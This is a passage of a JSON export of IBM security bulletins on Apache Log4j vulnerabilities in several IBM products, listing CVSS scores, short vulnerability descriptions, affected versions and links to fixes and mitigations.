Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T21:21:42", "type": "ibm", "title": "Security Bulletin: IBM Engineering Systems Design Rhapsody (Rhapsody) is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-27T21:21:42", "id": "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "href": "https://www.ibm.com/support/pages/node/6540566", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:00", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105) which is used by IBM Engineering Lifecycle Optimization - Publishing (PUB) and Rational Publishing Engine (RPE) Knowledge Center for logging . The fix includes upgrade to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.2 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0.1 \nIBM Engineering Lifecycle Optimization - Publishing (PUB)| 7.0 \nRational Publishing Engine (RPE)| 6.0.6.1 \nRational Publishing Engine (RPE)| 6.0.6 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nThe Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **IBM Engineering Lifecycle Optimization - Publishing (PUB) **(7.0,7.0.1,7.0.2) and **Rational Publishing Engine (RPE) **(6.0.6, 6.0.6.1) will need to be updated. Find the version corresponding to your offering click the link and follow the instructions to remediate your offering.\n\n * [Rational Publishing Engine (6.0.6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6\" ))\n * [Rational Publishing Engine (6.0.6.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/IBM+Rational+Publishing+Engine&release=6.0.6.1&platform=Windows&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Rational Publishing Engine 6.0.6.1\" ))\n * [IBM Engineering Lifecycle Optimization - Publishing (7.0, 7.0.1, 7.0.2)](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Optimization+-+Publishing&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-RPE-Publishing&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Engineering Lifecycle Optimization - Publishing \$7.0, 7.0.1, 7.0.2\$\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6RHZ\",\"label\":\"Rational Publishing Engine\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUBFB\",\"label\":\"IBM Engineering Lifecycle Optimization - Publishing\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0,7.0.1,7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T20:44:45", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Optimization - Publishing is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T20:44:45", "id": "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "href": "https://www.ibm.com/support/pages/node/6540672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:25", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Analytics has upgraded Apache Log4j to v2.16. This update also addresses CVE-2021-44228. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-45046 and CVE-2021-44228 have been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n13 Jan 2022 Updated Fix Version links for Bundle Customers to point to latest Interim Fixes that address Apache log4j vulnerabilities \n10 Jan 2022: Updated Fix Version titles to reflect updated latest IF version available. Updated the reference to the latest Security Bulletin that supersedes this one. Added more technical context to the Workarounds / Mitigations section and clarified the different links available in the Remediation / Fixes section. \n22 Dec 2021: IBM Cloud and Cloud Hosted instances remediation completion added to Remediation/Fixes \n21 Dec 2021: Modified Mitigation instructions to point to .jar and .pdf \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:29:59", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:29:59", "id": "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "href": "https://www.ibm.com/support/pages/node/6528388", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:38", "description": "## Summary\n\nMultiple vulnerabilities were identified within the Apache Log4j library (CVE-2021-45046, CVE-2021-45105) that is used by Netcool Operations Insight to provide logging functionality.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool Operations Insight| 1.4 \nNetcool Operations Insight| 1.5 \nNetcool Operations Insight| 1.6 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now. **\n\nPlease take careful inventory of components downloaded at any time and be sure to apply the remediations for any component that may have been installed whether or not it is currently in use.\n\nTo address the recent Apache Log4j vulnerabilities, **all** installed components must upgraded.\n\n**Redhat Openshift Platform**\n\nIf you are on a version between 1.4 and 1.6.2 move to IBM Netcool Operations Insight V1.6.3 on Red Hat OpenShift.\n\n<https://www.ibm.com/support/knowledgecenter/en/SSTPTP_1.6.3/com.ibm.netcool_ops.doc/soc/integration/task/soc_int_upgrade_cloud.html>\n\nInstall the recommended fix v1.6.3.2 as per\n\n<https://www.ibm.com/support/pages/node/6527810>\n\nThe fix includes Apache Log4j 2.17.1. \n \n--- \n \n**Traditional On Premise**\n\n| \n\n** **\n\n| \n---|---|--- \n**On Premise Component Product**| **IBM Netcool Operations Insight Version(s)**| **Remediation Steps** \n \nIBM Netcool Agile Service Manager\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6549838> \"Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j \$CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\$\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Cognos Analytics\n\n| \n\n1.6\n\n| \n\nPlease see steps for Bundled Customers in the Remediation section of [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities \$CVE-2021-45105, CVE-2021-44832\$\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Db2\n\n| \n\n1.4-1.6\n\n| \n\nSee[ Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \$CVE-2021-45046, CVE-2021-45105\$\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Jazz for Service Management| 1.4-1.6| \n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6536710> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities\$CVE-2021-45105, CVE-2021-45046\$\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539412> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability \$CVE-2021-44832\$\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool Impact| 1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \$CVE-2021-45105, CVE-2021-45046\$\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Netcool/Omnibus| 1.4-1.6| \n\nSee [Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6552546> \"Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code \$CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\$\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool/OMNIbus Probes and Gateways| 1.4-1.6| \n\nSee [Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library](<https://www.ibm.com/support/pages/node/256461?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library\" )\n\nand\n\n[Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library](<https://www.ibm.com/support/pages/node/255019?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library\" )\n\nThese include Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool/OMNIbus Web GUI\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities (CVE-2021-45046,CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6537564> \"Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities \$CVE-2021-45046,CVE-2021-45105\$\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Network Performance Insight\n\n| \n\n1.6.0-1.6.2\n\n| \n\nThere is an interim fix available on FixCentral at [(1.3.1.0-TIV-NPI-IF0005)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.3.1.0-TIV-NPI-IF0005&source=SAR&function=fixId&parent=ibm/Tivoli> \"\$1.3.1.0-TIV-NPI-IF0005\$\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Log Analysis\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: Log4j remote code execution vulnerability in Apache Solr and Logstash shipped with IBM Operations Analytics - Log Analysis (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6527250>)\n\nIf Apache Log4j CVE-2021-44228 has already been addressed by executing the steps documented in the bulletin above, they do not have to be duplicated.\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Predictive Insights| 1.4-1.6| \n\nSee [Security Bulletin: A vulnerability in Apache log4j (CVE-2021-45105) affects IBM Operations Analytics Predictive Insights](<https://www.ibm.com/support/pages/node/6541268> \"Security Bulletin: A vulnerability in Apache log4j \$CVE-2021-45105\$ affects IBM Operations Analytics Predictive Insights\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Business Service Manager (TBSM)| 1.4-1.6| \n\nFor IBM Tivoli Netcool Impact:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \$CVE-2021-45105, CVE-2021-45046\$\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1.\n\n________________________________________________________\n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \$CVE-2021-45105, CVE-2021-44832\$\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 have already been addressed by executing the steps documented in the bulletins above relating to those components, they do not have to be duplicated. \n \nIBM Tivoli Netcool Configuration Manager| 1.4-1.6| \n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \$CVE-2021-45105, CVE-2021-44832\$\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-45105 and CVE-2021-44832 have already been addressed by executing the steps documented in the bulletin above relating to the component, they do not have to be duplicated. \n \nIBM Tivoli Network Manager IP Edition| 1.4-1.6| \n\nSee [Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Network+Manager+IP+Edition&fixids=4.2.0.14-TIV-ITNMIP-LinuxAll-IF1&source=SAR> \"Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1\" )\n\nand follow instructions in ReadMe to remediate.\n\nThis includes Apache Log4j 2.17.1. \n \nIBM WebSphere Application Server| 